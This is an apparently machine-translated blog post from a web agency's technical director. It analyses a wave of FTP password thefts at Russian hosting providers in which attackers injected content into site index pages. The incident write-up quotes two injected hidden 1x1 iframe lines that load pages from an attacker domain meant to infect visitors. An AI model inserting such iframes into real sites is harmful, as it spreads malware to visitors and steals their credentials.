ここで私の友人と同僚は興味深い記事を書きました:
ZAOマスターホストの代表者の公式声明から
「最近の.masterhostの技術セキュリティサービスの専門家は、ユーザーのコンピューターからのFTPアクセスの詳細が盗まれた場合に急激な増加を記録しています。 これらは、許可されていないさまざまなアクションを実行するトロイの木馬またはウイルスの標的型ウェーブ攻撃である可能性が高いです。 弊社の専門家は、情報セキュリティソリューションに特化したパートナー企業と協力して、悪意のある攻撃の焦点を特定するために悪意のあるトラフィックを積極的に研究しています...
どうした
ある晴れた朝、裸の女性がいくつかのサイトのメインページと他のページに現れました。 HTMLレベルでは、次のようになりました。
iframe src = 'http://lem0n.info/km/ya.php' width = 1 height = 1 iframe
iframe src = 'http://lem0n.info/km/love.htm' width = 1 height = 1 iframe
このような行は、index.php、index.htm、index.htmlに挿入されました
ページをロードする際、訪問者はウイルスをロードしようとしました(残念ながら、ノートンアンチウイルスはそれを通過させませんでした)。サイトの通常のコンテンツに加えて、あらゆる種類の裸の女性がダウンロードされました。
問題は、ftpでファイルの編集があったことです。 彼らは、管理システムがハッキングされたのではないかと疑っていましたが、すべてが完全に間違っていることが判明しました。 htmlでコンパイルされたプロジェクトがハッキングされましたが、PHPについては言及されていません。 さらに、CHMODは644のすべての場所にありました。つまり、所有者またはルートがファイルを編集できました。
誰がこれをしたの?
もちろん、そのWalpurgis Nightのftpによるサイトへの訪問時に、マスターホストのログを要求しました。 ftpに関連付けられたIPアドレスは、SPORT.MCHOST.RUドメイン-84.252.148.70に関連付けられていることがわかりました。 これにより、ルートがそれとは無関係であることが明らかになりました。 mchost.ruを入力すると、「連絡先」に電子メールとICQ番号、「支払い方法」にYandexのお金しかない特定の不明瞭なホスティングが発見されました。 言い換えれば、このホスティングの場所は、衛星からであってもほとんど検出できません。 このサーバーが単純にハッキングされ、攻撃のプラットフォームとして使用されたことは明らかです。 もちろん、ホスティングの所有者はこれを認識しません。つまり、ログを提供しません。 残念ながら、攻撃者は手の届かないところに放置されます。
サイトをハッキングする方法は?
.Masterhostログは、サイトへのFTPアクセスの存在を確認します。つまり、誰かがパスワードを知っていたことを意味します。 パスワードが取得された可能性は低いです。 ローカルコンピューターでユーザーを検索し、ウイルスパスワードをどこかに送信することを提案したバージョンは、より妥当であると思われました。 このような攻撃に対する適切な予防措置は、すべての人に知られています。 事件は解決されたように見えたが...多くのサイトがハッキングされた。 これらのパスワードをすべて同時に知っている人はいませんでした。 Googleは、私たちが宇宙にいるのは一人ではないことを示唆しました。そのようなハッキングの波がネットワークを通過しました。
結論
このようなハッキングの大規模な性質は、問題がパスワードを送信するウイルスだけでなく、ホスティング業者にもあることを示唆しています。 すべての犠牲者がウイルスのために落ちたと信じることは難しいです。 どうすればホスティング業者をハッキングしてFTPのパスワードを見つけることができますか? これがFreeBSDハックである可能性は低いです-これには多くの理由があります。 これがハッキングコントロールパネルであると信じる人々と同意する必要があります。
1.コントロールパネルはFTPパスワードにアクセスできるため(パスワードの変更に使用できるため)、特定の要求により、少なくともパスワードハッシュのリスト(おそらくパスワード自体)を取得できます。
2.多くのホストをハッキング。 その結果、それらはすべてコントロールパネルに同じ脆弱性があります。 もちろん、マスターホストも他のホストもこれを直接認識しません。 ただし、ハッキングのトピックに関する彼らの声明のいくつかは、コントロールパネルのハッキングのバージョンを確認します。
例:Valuehost
現在の新機能:
+新しいFTPパスワード保存アルゴリズムを使用して、ハッキングから保護します。
+コントロールパネルに、新しいパスワードの有効期限が切れる日数を設定する機能が導入されました。
+サイトを長期間更新しない場合は、FTP経由のアクセスをブロックする機能が導入されます。
新しいパスワード保存アルゴリズム、パスワード有効期限機能-総当たり攻撃によってパスワードの盗難から保護するのに役立つ革新。 そのため、その前に、誰かがパスワードを整理する機会がまだありました。
サイトを長時間更新しない場合、キラーアイテムであるFTPアクセスブロック機能が導入されました。対策は講じられていますが、ホストはFTPの完全なパスワード保護を保証できず、セキュリティ上の理由からFTPアクセスを完全に無効にすることを提案します。
マスターホストは声明の中でより注意を払っていますが、ハッキングの事実は彼にも同様の問題があることを確認しています。 もちろん、最初は問題はコントロールパネルとしてインストールされたソフトウェアにありますが、ホストの位置はまだ間違っていることを理解する必要があります。 彼は自分でコントロールパネルを開発することを気にしませんでした。
この問題に関する反省の結果は非常に嘆かわしいです。リュウゼツランとマスターホストがハッキングされた場合、他のホスティング事業者について何が言えるでしょうか。 ホスティング事業者がコントロールパネルを開発して適切な保護を行い、人々がパスワードをより慎重に保護し、ウイルスから自分自身を保護することを期待し、信じていることは変わりません。 ご存知の通り、最後に死ぬことを願っています...
必要な追加
ハッキングされたサイトからロードしようとしたウイルスは、実際にコンピューターからパスワードを見つけて送信します。 そのため、2つのFTPアカウントが運用サーバーにハッキングされましたが、原則としてコントロールパネルはなく、アクセスログでFTPのパスワードを検索する試みはありません。 そのため、コンピューターを保護し、パスワードストレージをより真剣に考える必要もあります。
ZAOマスターホストの代表者の公式声明から
「コンピューターの感染リスクを減らすために、ウイルス対策データベースを含むウイルス対策ソフトウェアをタイムリーに更新することをお勧めします。データの整合性が侵害され、不正なユーザーがデータを使用する疑いがある場合は、すぐにFTPアクセスパスワードを変更してくださいリソースを確認し、最新のウイルス対策ソフトウェアを使用してパソコンを確認してください。
クリエイティブピープルのテクニカルディレクター
A.レベデフ
FTPパスワード盗難波:ハッカー、ホスティング業者、および裸の女性
All Articles